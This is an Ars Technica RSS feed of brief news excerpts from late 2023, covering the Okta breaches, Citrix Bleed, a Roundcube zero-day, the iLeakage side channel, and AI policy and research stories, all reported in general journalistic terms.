Biz & IT – Ars Technica https://arstechnica.com Serving the Technologist for more than a decade. IT news, reviews, and analysis. Sat, 04 Nov 2023 18:32:57 +0000 en-US hourly 1 https://wordpress.org/?v=6.0.3 https://cdn.arstechnica.net/wp-content/uploads/2016/10/cropped-ars-logo-512_480-32x32.png Biz & IT – Ars Technica https://arstechnica.com 32 32 No, Okta, senior management, not an errant employee, caused you to get hacked https://arstechnica.com/?p=1981227 https://arstechnica.com/information-technology/2023/11/no-okta-senior-management-not-an-errant-employee-caused-you-to-get-hacked/#comments Sat, 04 Nov 2023 00:31:12 +0000 https://arstechnica.com/?p=1981227
No, Okta, senior management, not an errant employee, caused you to get hacked

Enlarge (credit: Omar Marques/SOPA Images/LightRocket via Getty Images)

Identity and authentication management provider Okta on Friday published an autopsy report on a recent breach that gave hackers administrative access to the Okta accounts of some of its customers. While the postmortem emphasizes the transgressions of an employee logging into a personal Google account on a work device, the biggest contributing factor was something the company understated: a badly configured service account.

In a post, Okta chief security officer David Bradbury said that the most likely way the threat actor behind the attack gained access to parts of his company’s customer support system was by first compromising an employee’s personal device or personal Google account and, from there, obtaining the username and password for a special form of account, known as a service account, used for connecting to the support segment of the Okta network. Once the threat actor had access, they could obtain administrative credentials for entering the Okta accounts belonging to 1Password, BeyondTrust, Cloudflare, and other Okta customers.

Passing the buck

“During our investigation into suspicious use of this account, Okta Security identified that an employee had signed-in to their personal Google profile on the Chrome browser of their Okta-managed laptop,” Bradbury wrote. “The username and password of the service account had been saved into the employee’s personal Google account. The most likely avenue for exposure of this credential is the compromise of the employee’s personal Google account or personal device.”

Read 12 remaining paragraphs | Comments

]]>
https://arstechnica.com/information-technology/2023/11/no-okta-senior-management-not-an-errant-employee-caused-you-to-get-hacked/feed/ 125
Okta hit by another breach, this one stealing employee data from 3rd-party vendor https://arstechnica.com/?p=1980825 https://arstechnica.com/security/2023/11/okta-hit-by-another-breach-this-one-stealing-employee-data-from-3rd-party-vendor/#comments Thu, 02 Nov 2023 21:41:41 +0000 https://arstechnica.com/?p=1980825
Okta hit by another breach, this one stealing employee data from 3rd-party vendor

Enlarge (credit: Getty Images)

Identity and authentication management provider Okta has been hit by another breach, this one against a third-party vendor that allowed hackers to steal personal information for 5,000 Okta employees.

The compromise was carried out in late September against Rightway Healthcare, a service Okta uses to support employees and their dependents in finding health care providers and plan rates. An unidentified threat actor gained access to Rightway’s network and made off with an eligibility census file the vendor maintained on behalf of Okta. Okta learned of the compromise and data theft on October 12 and didn’t disclose it until Thursday, exactly three weeks later.

“The types of personal information contained in the impacted eligibility census file included your Name, Social Security Number, and health or medical insurance plan number,” a letter sent to affected Okta employees stated. “We have no evidence to suggest that your personal information has been misused against you.”

Read 8 remaining paragraphs | Comments

]]>
https://arstechnica.com/security/2023/11/okta-hit-by-another-breach-this-one-stealing-employee-data-from-3rd-party-vendor/feed/ 25
This tiny device is sending updated iPhones into a never-ending DoS loop https://arstechnica.com/?p=1980496 https://arstechnica.com/security/2023/11/flipper-zero-gadget-that-doses-iphones-takes-once-esoteric-attacks-mainstream/#comments Thu, 02 Nov 2023 11:15:24 +0000 https://arstechnica.com/?p=1980496
A fully updated iPhone (left) after being force crashed by a Flipper Zero (right).

Enlarge / A fully updated iPhone (left) after being force crashed by a Flipper Zero (right). (credit: Jeroen van der Ham)

One morning two weeks ago, security researcher Jeroen van der Ham was traveling by train in the Netherlands when his iPhone suddenly displayed a series of pop-up windows that made it nearly impossible to use his device.

“My phone was getting these popups every few minutes and then my phone would reboot,” he wrote to Ars in an online interview. “I tried putting it in lock down mode, but it didn't help.”

To van der Ham’s surprise and chagrin, the same debilitating stream of pop-ups hit again on the afternoon commute home, not just against his iPhone but the iPhones of other passengers in the same train car. He then noticed that one of the same passengers nearby had also been present that morning. Van der Ham put two and two together and fingered the passenger as the culprit.

Read 16 remaining paragraphs | Comments

]]>
https://arstechnica.com/security/2023/11/flipper-zero-gadget-that-doses-iphones-takes-once-esoteric-attacks-mainstream/feed/ 153
“Catastrophic” AI harms among warnings in declaration signed by 28 nations https://arstechnica.com/?p=1980413 https://arstechnica.com/information-technology/2023/11/catastrophic-ai-harms-among-warnings-in-declaration-signed-by-28-nations/#comments Wed, 01 Nov 2023 21:21:46 +0000 https://arstechnica.com/?p=1980413
Technology Secretary Michelle Donelan (front row center) is joined by international counterparts for a group photo at the AI Safety Summit at Bletchley Park in Milton Keynes, Buckinghamshire on Wednesday November 1, 2023.

Enlarge / UK Technology Secretary Michelle Donelan (front row center) is joined by international counterparts for a group photo at the AI Safety Summit at Bletchley Park in Milton Keynes, Buckinghamshire, on November 1, 2023. (credit: Getty Images)

On Wednesday, the UK hosted an AI Safety Summit attended by 28 countries, including the US and China, which gathered to address potential risks posed by advanced AI systems, reports The New York Times. The event included the signing of "The Bletchley Declaration," which warns of potential harm from advanced AI and calls for international cooperation to ensure responsible AI deployment.

"There is potential for serious, even catastrophic, harm, either deliberate or unintentional, stemming from the most significant capabilities of these AI models," reads the declaration, named after Bletchley Park, the site of the summit and a historic World War II location linked to Alan Turing. Turing wrote influential early speculation about thinking machines.

Rapid advancements in machine learning, including the appearance of chatbots like ChatGPT, have prompted governments worldwide to consider regulating AI. Their concerns led to the meeting, which has drawn criticism for its invitation list. In the tech world, representatives from major companies included those from Anthropic, Google DeepMind, IBM, Meta, Microsoft, Nvidia, OpenAI, and Tencent. Civil society groups, like Britain's Ada Lovelace Institute and the Algorithmic Justice League in Massachusetts, also sent representatives.

Read 6 remaining paragraphs | Comments

]]>
https://arstechnica.com/information-technology/2023/11/catastrophic-ai-harms-among-warnings-in-declaration-signed-by-28-nations/feed/ 101
Inserted AI-generated Microsoft poll about woman’s death rankles The Guardian https://arstechnica.com/?p=1980174 https://arstechnica.com/information-technology/2023/10/inserted-ai-generated-microsoft-poll-about-womans-death-rankles-the-guardian/#comments Tue, 31 Oct 2023 19:53:37 +0000 https://arstechnica.com/?p=1980174
Illustration of robot hands using a typewriter.

Enlarge (credit: Getty Images)

On Tuesday, The Guardian accused Microsoft of damaging its journalistic reputation by publishing an AI-generated poll beside one of its articles on the Microsoft Start website. The poll, created by an AI model on Microsoft's news platform, speculated on the cause of a woman's death, reportedly triggering reader anger and leading to reputational concerns for the news organization.

"This has to be the most pathetic, disgusting poll I’ve ever seen," wrote one commenter on the story. The comment section has since been disabled.

The poll appeared beside a republished Guardian story about Lilie James, a 21-year-old water polo coach who was found dead with head injuries in Sydney. The AI-generated poll presented readers with three choices to speculate on the cause of James' death: murder, accident, or suicide. Following negative reactions, the poll was removed, but critical comments remained visible for a time before their removal.

Read 6 remaining paragraphs | Comments

]]>
https://arstechnica.com/information-technology/2023/10/inserted-ai-generated-microsoft-poll-about-womans-death-rankles-the-guardian/feed/ 119
Windows CE, Microsoft’s stunted middle child, reaches end of support at 26 years https://arstechnica.com/?p=1979685 https://arstechnica.com/gadgets/2023/10/windows-ce-microsofts-stunted-middle-child-reaches-end-of-support-at-26-years/#comments Mon, 30 Oct 2023 21:46:11 +0000 https://arstechnica.com/?p=1979685
Man in sleeveless T-shirt, standing with a shovel over the misty red grave of Windows CE logo

Enlarge (credit: Aurich Lawson | Getty Images)

It was a proto-netbook. It was a palmtop. It was a PDA. It was Windows Phone 7 but not Windows Phone 8, and then it was an embedded ghost. Its parents never seemed to know what to do with it after it grew up, beyond offer it up for anybody to shape in their own image. And then, earlier this month, with little notice, Windows CE was no more, at least as a supported operating system. Windows Embedded Compact 2013, or sometimes Windows CE 8.0, reached end of support on October 10, 2023, as noted by The Register.

Windows CE, which had a name that didn't stand for anything and was sometimes rendered as "wince," is not survived by anything, really. Remembrances have been offered by every Microsoft CEO since its inception and one former Ars writer. A public service for the operating system will be held in the comments.

The OS that fit in small spaces

Windows CE was initially Microsoft Pegasus, a team working to create a very low-power MIPS or SuperH-based reference platform for manufacturers making the smallest computers with keyboards you could make back then. Devices like the NEC MobilePro 200, Casio (Cassiopeia) A-10, and HP 300LX started appearing in late 1996 and early 1997, with tiny keyboards, more-landscape-than-landscape displays, and, by modern standards, an impressive number of ports.

Read 12 remaining paragraphs | Comments

]]>
https://arstechnica.com/gadgets/2023/10/windows-ce-microsofts-stunted-middle-child-reaches-end-of-support-at-26-years/feed/ 143
“This vulnerability is now under mass exploitation.” Citrix Bleed bug bites hard https://arstechnica.com/?p=1979860 https://arstechnica.com/security/2023/10/critical-citrix-bleed-vulnerability-allowing-mfa-bypass-comes-under-mass-exploitation/#comments Mon, 30 Oct 2023 21:39:07 +0000 https://arstechnica.com/?p=1979860
“This vulnerability is now under mass exploitation.” Citrix Bleed bug bites hard

Enlarge (credit: Getty Images)

A vulnerability that allows attackers to bypass multifactor authentication and access enterprise networks using hardware sold by Citrix is under mass exploitation by ransomware hackers despite a patch being available for three weeks.

Citrix Bleed, the common name for the vulnerability, carries a severity rating of 9.4 out of a possible 10, a relatively high designation for a mere information-disclosure bug. The reason: the information disclosed can include session tokens, which the hardware assigns to devices that have already successfully provided credentials, including those providing MFA. The vulnerability, tracked as CVE-2023-4966 and residing in Citrix’s NetScaler Application Delivery Controller and NetScaler Gateway, has been under active exploitation since August. Citrix issued a patch on October 10.

Repeat: This is not a drill

Attacks have only ramped up recently, prompting security researcher Kevin Beaumont on Saturday to declare: “This vulnerability is now under mass exploitation.” He went on to say, “From talking to multiple organizations, they are seeing widespread exploitation.”

Read 7 remaining paragraphs | Comments

]]>
https://arstechnica.com/security/2023/10/critical-citrix-bleed-vulnerability-allowing-mfa-bypass-comes-under-mass-exploitation/feed/ 22
Biden issues sweeping executive order that touches AI risk, deepfakes, privacy https://arstechnica.com/?p=1979537 https://arstechnica.com/information-technology/2023/10/biden-ai-executive-order-requires-safety-testing-for-ai-that-poses-serious-risk/#comments Mon, 30 Oct 2023 16:43:55 +0000 https://arstechnica.com/?p=1979537
Biden issues sweeping executive order that touches AI risk, deepfakes, privacy

Enlarge (credit: Aurich Lawson | Getty Images)

On Monday, President Joe Biden issued an executive order on AI that outlines the federal government's first comprehensive regulations on generative AI systems. The order includes testing mandates for advanced AI models to ensure they can't be used for creating weapons, suggestions for watermarking AI-generated media, and provisions addressing privacy and job displacement.

In the United States, an executive order allows the president to manage and operate the federal government. Using his authority to set terms for government contracts, Biden aims to influence AI standards by stipulating that federal agencies must only enter into contracts with companies that comply with the government's newly outlined AI regulations. This approach utilizes the federal government's purchasing power to drive compliance with the newly set standards.

As of press time Monday, the White House had not yet released the full text of the executive order, but from the Fact Sheet authored by the administration and through reporting on drafts of the order by Politico and The New York Times, we can relay a picture of its content. Some parts of the order reflect positions first specified in Biden's 2022 "AI Bill of Rights" guidelines, which we covered last October.

Read 10 remaining paragraphs | Comments

]]>
https://arstechnica.com/information-technology/2023/10/biden-ai-executive-order-requires-safety-testing-for-ai-that-poses-serious-risk/feed/ 80
Microsoft profiles new threat group with unusual but effective practices https://arstechnica.com/?p=1979474 https://arstechnica.com/security/2023/10/microsoft-profiles-new-threat-group-with-unusual-but-effective-practices/#comments Fri, 27 Oct 2023 23:20:36 +0000 https://arstechnica.com/?p=1979474
This is not what a hacker looks like. Except on hacker cosplay night.

Enlarge / This is not what a hacker looks like. Except on hacker cosplay night. (credit: Getty Images | Bill Hinton)

Microsoft has been tracking a threat group that stands out for its ability to cash in from data theft hacks that use broad social engineering attacks, painstaking research, and occasional physical threats.

Unlike many ransomware attack groups, Octo Tempest, as Microsoft has named the group, doesn’t encrypt data after gaining illegal access to it. Instead, the threat actor threatens to share the data publicly unless the victim pays a hefty ransom. To defeat targets’ defenses, the group resorts to a host of techniques, which, besides social engineering, include SIM swaps, SMS phishing, and live voice calls. Over time, the group has grown increasingly aggressive, at times resorting to threats of physical violence if a target doesn’t comply with instructions to turn over credentials.

“In rare instances, Octo Tempest resorts to fear-mongering tactics, targeting specific individuals through phone calls and texts,” Microsoft researchers wrote in a post on Wednesday. “These actors use personal information, such as home addresses and family names, along with physical threats to coerce victims into sharing credentials for corporate access.”

Read 6 remaining paragraphs | Comments

]]>
https://arstechnica.com/security/2023/10/microsoft-profiles-new-threat-group-with-unusual-but-effective-practices/feed/ 73
People are speaking with ChatGPT for hours, bringing 2013’s Her closer to reality https://arstechnica.com/?p=1979181 https://arstechnica.com/information-technology/2023/10/people-are-speaking-with-chatgpt-for-hours-bringing-2013s-her-closer-to-reality/#comments Fri, 27 Oct 2023 16:52:55 +0000 https://arstechnica.com/?p=1979181
Joaquin Phoenix in 'Her' (2013)

Enlarge / Joaquin Phoenix talking with AI in Her (2013). (credit: Warner Bros.)

In 2013, Spike Jonze's Her imagined a world where humans form deep emotional connections with AI, challenging perceptions of love and loneliness. Ten years later, thanks to ChatGPT's recently added voice features, people are playing out a small slice of Her in reality, having hours-long discussions with the AI assistant on the go.

In 2016, we put Her on our list of top sci-fi films of all time, and it also made our top films of the 2010s list. In the film, Joaquin Phoenix's character falls in love with an AI personality called Samantha (voiced by Scarlett Johansson), and he spends much of the film walking through life, talking to her through wireless earbuds reminiscent of Apple AirPods, which launched in 2016. In reality, ChatGPT isn't as situationally aware as Samantha was in the film, does not have a long-term memory, and OpenAI has done enough conditioning on ChatGPT to keep conversations from getting too intimate or personal. But that hasn't stopped people from having long talks with the AI assistant to pass the time anyway.

Last week, we related a story in which AI researcher Simon Willison spent a long time talking to ChatGPT verbally. "I had an hourlong conversation while walking my dog the other day," he told Ars for that report. "At one point, I thought I'd turned it off, and I saw a pelican, and I said to my dog, 'Oh, wow, a pelican!' And my AirPod went, 'A pelican, huh? That's so exciting for you! What's it doing?' I've never felt so deeply like I'm living out the first ten minutes of some dystopian sci-fi movie."

Read 11 remaining paragraphs | Comments

]]>
https://arstechnica.com/information-technology/2023/10/people-are-speaking-with-chatgpt-for-hours-bringing-2013s-her-closer-to-reality/feed/ 142
iPhones have been exposing your unique MAC despite Apple’s promises otherwise https://arstechnica.com/?p=1979099 https://arstechnica.com/security/2023/10/iphone-privacy-feature-hiding-wi-fi-macs-has-failed-to-work-for-3-years/#comments Thu, 26 Oct 2023 21:48:04 +0000 https://arstechnica.com/?p=1979099
Private Wi-Fi address setting on an iPhone.

Enlarge / Private Wi-Fi address setting on an iPhone. (credit: Apple)

Three years ago, Apple introduced a privacy-enhancing feature that hid the Wi-Fi address of iPhones and iPads when they joined a network. On Wednesday, the world learned that the feature has never worked as advertised. Despite promises that this never-changing address would be hidden and replaced with a private one that was unique to each SSID, Apple devices have continued to display the real one, which in turn got broadcast to every other connected device on the network.

The problem is that a Wi-Fi media access control address—typically called a media access control address or simply a MAC—can be used to track individuals from network to network, in much the way a license plate number can be used to track a vehicle as it moves around a city. Case in point: In 2013, a researcher unveiled a proof-of-concept device that logged the MAC of all devices it came into contact with. The idea was to distribute lots of them throughout a neighborhood or city and build a profile of iPhone users, including the social media sites they visited and the many locations they visited each day.

In the decade since, HTTPS-encrypted communications have become standard, so the ability of people on the same network to monitor other people's traffic is generally not feasible. Still, a permanent MAC provides plenty of trackability, even now.

Read 11 remaining paragraphs | Comments

]]>
https://arstechnica.com/security/2023/10/iphone-privacy-feature-hiding-wi-fi-macs-has-failed-to-work-for-3-years/feed/ 139
Pro-Russia hackers target inboxes with 0-day in webmail app used by millions https://arstechnica.com/?p=1978806 https://arstechnica.com/security/2023/10/pro-russia-hackers-target-inboxes-with-0-day-in-webmail-app-used-by-millions/#comments Wed, 25 Oct 2023 22:21:49 +0000 https://arstechnica.com/?p=1978806
Pro-Russia hackers target inboxes with 0-day in webmail app used by millions

Enlarge (credit: Getty Images)

A relentless team of pro-Russia hackers has been exploiting a zero-day vulnerability in widely used webmail software in attacks targeting governmental entities and a think tank, all in Europe, researchers from security firm ESET said on Wednesday.

The previously unknown vulnerability resulted from a critical cross-site scripting error in Roundcube, a server application used by more than 1,000 webmail services and millions of their end users. Members of a pro-Russia and Belarus hacking group tracked as Winter Vivern used the XSS bug to inject JavaScript into the Roundcube server application. The injection was triggered simply by viewing a malicious email, which caused the server to send emails from selected targets to a server controlled by the threat actor.

No manual interaction required

“In summary, by sending a specially crafted email message, attackers are able to load arbitrary JavaScript code in the context of the Roundcube user’s browser window,” ESET researcher Matthieu Faou wrote. “No manual interaction other than viewing the message in a web browser is required.”

Read 7 remaining paragraphs | Comments

]]>
https://arstechnica.com/security/2023/10/pro-russia-hackers-target-inboxes-with-0-day-in-webmail-app-used-by-millions/feed/ 42
University of Chicago researchers seek to “poison” AI art generators with Nightshade https://arstechnica.com/?p=1978501 https://arstechnica.com/information-technology/2023/10/university-of-chicago-researchers-seek-to-poison-ai-art-generators-with-nightshade/#comments Wed, 25 Oct 2023 21:21:23 +0000 https://arstechnica.com/?p=1978501
Robotic arm holding dangerous chemical.

Enlarge (credit: Getty Images)

On Friday, a team of researchers at the University of Chicago released a research paper outlining "Nightshade," a data poisoning technique aimed at disrupting the training process for AI models, reports MIT Technology Review and VentureBeat. The goal is to help visual artists and publishers protect their work from being used to train generative AI image synthesis models, such as Midjourney, DALL-E 3, and Stable Diffusion.

The open source "poison pill" tool (as the University of Chicago's press department calls it) alters images in ways invisible to the human eye that can corrupt an AI model's training process. Many image synthesis models, with notable exceptions of those from Adobe and Getty Images, largely use data sets of images scraped from the web without artist permission, which includes copyrighted material. (OpenAI licenses some of its DALL-E training images from Shutterstock.)

AI researchers' reliance on commandeered data scraped from the web, which is seen as ethically fraught by many, has also been key to the recent explosion in generative AI capability. It took an entire Internet of images with annotations (through captions, alt text, and metadata) created by millions of people to create a data set with enough variety to create Stable Diffusion, for example. It would be impractical to hire people to annotate hundreds of millions of images from the standpoint of both cost and time. Those with access to existing large image databases (such as Getty and Shutterstock) are at an advantage when using licensed training data.

Read 10 remaining paragraphs | Comments

]]>
https://arstechnica.com/information-technology/2023/10/university-of-chicago-researchers-seek-to-poison-ai-art-generators-with-nightshade/feed/ 155
Apple backs national right-to-repair bill, offering parts, manuals, and tools https://arstechnica.com/?p=1978483 https://arstechnica.com/gadgets/2023/10/apple-backs-national-right-to-repair-bill-offering-parts-manuals-and-tools/#comments Wed, 25 Oct 2023 19:19:31 +0000 https://arstechnica.com/?p=1978483
Page from Apple's repair manual showing the removal of a battery from an M2 MacBook Air

Enlarge / A section of Apple's repair manual for the M2 MacBook Air from 2022. Apple already offers customers some repair manuals and parts through its Self-Service Repair program. (credit: Apple)

Right-to-repair advocates have long stated that passing repair laws in individual states was worth the uphill battle. Once enough states demanded that manufacturers make parts, repair guides, and diagnostic tools available, few companies would want to differentiate their offerings and policies and would instead pivot to national availability.

On Tuesday, Apple did exactly that. Following the passage of California's repair bill that Apple supported, requiring seven years of parts, specialty tools, and repair manual availability, Apple announced Tuesday that it would back a similar bill on a federal level. It would also make its parts, tools, and repair documentation available to both non-affiliated repair shops and individual customers, "at fair and reasonable prices."

"We intend to honor California's new repair provisions across the United States," said Brian Naumann, Apple's vice president for service and operation management, at a White House event Tuesday.

Read 9 remaining paragraphs | Comments

]]>
https://arstechnica.com/gadgets/2023/10/apple-backs-national-right-to-repair-bill-offering-parts-manuals-and-tools/feed/ 85
Hackers can force iOS and macOS browsers to divulge passwords and much more https://arstechnica.com/?p=1978389 https://arstechnica.com/security/2023/10/hackers-can-force-ios-and-macos-browsers-to-divulge-passwords-and-a-whole-lot-more/#comments Wed, 25 Oct 2023 17:00:39 +0000 https://arstechnica.com/?p=1978389
Hackers can force iOS and macOS browsers to divulge passwords and much more

Enlarge (credit: Kim et al.)

Researchers have devised an attack that forces Apple’s Safari browser to divulge passwords, Gmail message content, and other secrets by exploiting a side channel vulnerability in the A- and M-series CPUs running modern iOS and macOS devices.

iLeakage, as the academic researchers have named the attack, is practical and requires minimal resources to carry out. It does, however, require extensive reverse-engineering of Apple hardware and significant expertise in exploiting a class of vulnerability known as a side channel, which leaks secrets based on clues left in electromagnetic emanations, data caches, or other manifestations of a targeted system. The side channel in this case is speculative execution, a performance enhancement feature found in modern CPUs that has formed the basis of a wide corpus of attacks in recent years. The nearly endless stream of exploit variants has left chip makers—primarily Intel and, to a lesser extent, AMD—scrambling to devise mitigations.

Exploiting WebKit on Apple silicon

The researchers implement iLeakage as a website. When visited by a vulnerable macOS or iOS device, the website uses JavaScript to surreptitiously open a separate website of the attacker’s choice and recover site content rendered in a pop-up window. The researchers have successfully leveraged iLeakage to recover YouTube viewing history, the content of a Gmail inbox—when a target is logged in—and a password as it’s being autofilled by a credential manager. (In an email sent five days after this post went live, a Google representative pointed out the obvious: the leakage is the result of the side-channel and WebKit behavior and Gmail is simply a hypothetical downstream target. There are no indications iLeakage has been exploited in the wild.)

Read 19 remaining paragraphs | Comments

]]>
https://arstechnica.com/security/2023/10/hackers-can-force-ios-and-macos-browsers-to-divulge-passwords-and-a-whole-lot-more/feed/ 67
“Do not open robots,” warns Oregon State amid college food delivery bomb prank https://arstechnica.com/?p=1978421 https://arstechnica.com/information-technology/2023/10/do-not-open-robots-warns-oregon-state-amid-college-food-delivery-bomb-prank/#comments Wed, 25 Oct 2023 15:14:20 +0000 https://arstechnica.com/?p=1978421
A 2020 file photo of a Starship Technologies food delivery robot.

Enlarge / A 2020 file photo of a Starship Technologies food delivery robot. Food is stored inside the robot's housing during transportation and opened upon delivery. (credit: Leon Neal/Getty Images)

On Tuesday, officials at Oregon State University issued a warning on social media about a bomb threat concerning Starship Technologies food delivery robots, autonomous wheeled drones that deliver food orders stored within a built-in container. By 7 pm local time, a suspect had been arrested in the prank, and officials declared there had been no bombs hidden within the robots.

"Bomb Threat in Starship food delivery robots," reads the 12:20 pm initial X post from OSU. "Do not open robots. Avoid all robots until further notice." In follow-up posts, OSU officials said they were "remotely isolating robots in a safe location" for investigation by a technician. By 3:54 pm local time, experts had cleared the robots and promised they would be "back in service" by 4 pm.

In response, Starship Technologies provided this statement to the press: "A student at Oregon State University sent a bomb threat, via social media, that involved Starship’s robots on the campus. While the student has subsequently stated this is a joke and a prank, Starship suspended the service. Safety is of the utmost importance to Starship and we are cooperating with law enforcement and the university during this investigation."

Read 2 remaining paragraphs | Comments

]]>
https://arstechnica.com/information-technology/2023/10/do-not-open-robots-warns-oregon-state-amid-college-food-delivery-bomb-prank/feed/ 73
US surprises Nvidia by speeding up new AI chip export ban https://arstechnica.com/?p=1978300 https://arstechnica.com/information-technology/2023/10/ai-chip-wars-us-curbs-nvidia-gpu-chip-exports-sooner-than-expected/#comments Tue, 24 Oct 2023 21:07:12 +0000 https://arstechnica.com/?p=1978300
The Nvidia H100 Tensor Core GPU

Enlarge / A press photo of the Nvidia H100 Tensor Core GPU. (credit: Nvidia)

On Tuesday, chip designer Nvidia announced in an SEC filing that new US export restrictions on its high-end AI GPU chips to China are now in effect sooner than expected, according to a report from Reuters. The curbs were initially scheduled to take effect 30 days after their announcement on October 17 and are designed to prevent China, Iran, and Russia from acquiring advanced AI chips.

The banned chips are advanced graphics processing units (GPUs) that are commonly used for training and running deep learning AI applications similar to ChatGPT and AI image generators, among other uses. GPUs are well-suited for neural networks because their massively parallel architecture performs the necessary matrix multiplications involved in running neural networks faster than conventional processors.

The Biden administration initially announced an advanced AI chip export ban in September 2022, and in reaction, Nvidia designed and released new chips, the A800 and H800, to comply with those export rules for the Chinese market. In November 2022, Nvidia told The Verge that the A800 "meets the US Government’s clear test for reduced export control and cannot be programmed to exceed it." However, the new curbs enacted Monday specifically halt the exports of these modified Nvidia AI chips. The Nvidia A100, H100, and L40S chips are also included in the export restrictions.

Read 3 remaining paragraphs | Comments

]]>
https://arstechnica.com/information-technology/2023/10/ai-chip-wars-us-curbs-nvidia-gpu-chip-exports-sooner-than-expected/feed/ 78
1Password detects “suspicious activity” in its internal Okta account https://arstechnica.com/?p=1978094 https://arstechnica.com/security/2023/10/1password-detects-suspicious-activity-in-its-internal-okta-account/#comments Mon, 23 Oct 2023 20:56:49 +0000 https://arstechnica.com/?p=1978094
1Password detects “suspicious activity” in its internal Okta account

Enlarge (credit: 1Password)

1Password, a password manager used by millions of people and more than 100,000 businesses, said it detected suspicious activity on a company account provided by Okta, the identity and authentication service that disclosed a breach on Friday.

“On September 29, we detected suspicious activity on our Okta instance that we use to manage our employee-facing apps,” 1Password CTO Pedro Canahuati wrote in an email. “We immediately terminated the activity, investigated, and found no compromise of user data or other sensitive systems, either employee-facing or user-facing.”

Since then, Canahuati said, his company has been working with Okta to determine the means that the unknown attacker used to access the account. On Friday, investigators confirmed it resulted from a breach Okta reported hitting its customer support management system.

Read 9 remaining paragraphs | Comments

]]>
https://arstechnica.com/security/2023/10/1password-detects-suspicious-activity-in-its-internal-okta-account/feed/ 101
Stanford researchers challenge OpenAI, others over AI transparency in new report https://arstechnica.com/?p=1977869 https://arstechnica.com/information-technology/2023/10/stanford-researchers-challenge-openai-others-on-ai-transparency-in-new-report/#comments Mon, 23 Oct 2023 19:59:50 +0000 https://arstechnica.com/?p=1977869
A dirty windshield with the letters

Enlarge (credit: Getty Images / Benj Edwards)

On Wednesday, Stanford University researchers issued a report on major AI models and found them greatly lacking in transparency, reports Reuters. The report, called "The Foundation Model Transparency Index," examined models (such as GPT-4) created by OpenAI, Google, Meta, Anthropic, and others. It aims to shed light on the data and human labor used in training the models, calling for increased disclosure from companies.

Foundation models refer to AI systems trained on large datasets capable of performing tasks, from writing to generating images. They've become key to the rise of generative AI technology, particularly since the launch of OpenAI's ChatGPT in November 2022. As businesses and organizations increasingly incorporate these models into their operations, fine-tuning them for their own needs, the researchers argue that understanding their limitations and biases has become essential.

"Less transparency makes it harder for other businesses to know if they can safely build applications that rely on commercial foundation models; for academics to rely on commercial foundation models for research; for policymakers to design meaningful policies to rein in this powerful technology; and for consumers to understand model limitations or seek redress for harms caused," writes Stanford in a news release.

Read 10 remaining paragraphs | Comments

]]>
https://arstechnica.com/information-technology/2023/10/stanford-researchers-challenge-openai-others-on-ai-transparency-in-new-report/feed/ 22
Eureka: With GPT-4 overseeing training, robots can learn much faster https://arstechnica.com/?p=1977747 https://arstechnica.com/information-technology/2023/10/eureka-uses-gpt-4-and-massively-parallel-simulations-to-accelerate-robot-training/#comments Mon, 23 Oct 2023 13:37:56 +0000 https://arstechnica.com/?p=1977747
In this still captured from a video provided by Nvidia, a simulated robot hand learns pen tricks, trained by Eureka, using simultaneous trials.

Enlarge / In this still captured from a video provided by Nvidia, a simulated robot hand learns pen tricks, trained by Eureka, using simultaneous trials. (credit: Nvidia)

On Friday, researchers from Nvidia, UPenn, Caltech, and the University of Texas at Austin announced Eureka, an algorithm that uses OpenAI's GPT-4 language model for designing training goals (called "reward functions") to enhance robot dexterity. The work aims to bridge the gap between high-level reasoning and low-level motor control, allowing robots to learn complex tasks rapidly using massively parallel simulations that run through trials simultaneously. According to the team, Eureka outperforms human-written reward functions by a substantial margin.

Before robots can interact with the real world successfully, they need to learn how to move their robot bodies to achieve goals—like picking up objects or moving. Instead of making a physical robot try and fail one task at a time to learn in a lab, researchers at Nvidia have been experimenting with using video game-like computer worlds (thanks to platforms called Isaac Sim and Isaac Gym) that simulate three-dimensional physics. These allow for massively parallel training sessions to take place in many virtual worlds at once, dramatically speeding up training time.

"Leveraging state-of-the-art GPU-accelerated simulation in Nvidia Isaac Gym," writes Nvidia on its demonstration page, "Eureka is able to quickly evaluate the quality of a large batch of reward candidates, enabling scalable search in the reward function space." They call it "rapid reward evaluation via massively parallel reinforcement learning."

Read 6 remaining paragraphs | Comments

]]>
https://arstechnica.com/information-technology/2023/10/eureka-uses-gpt-4-and-massively-parallel-simulations-to-accelerate-robot-training/feed/ 63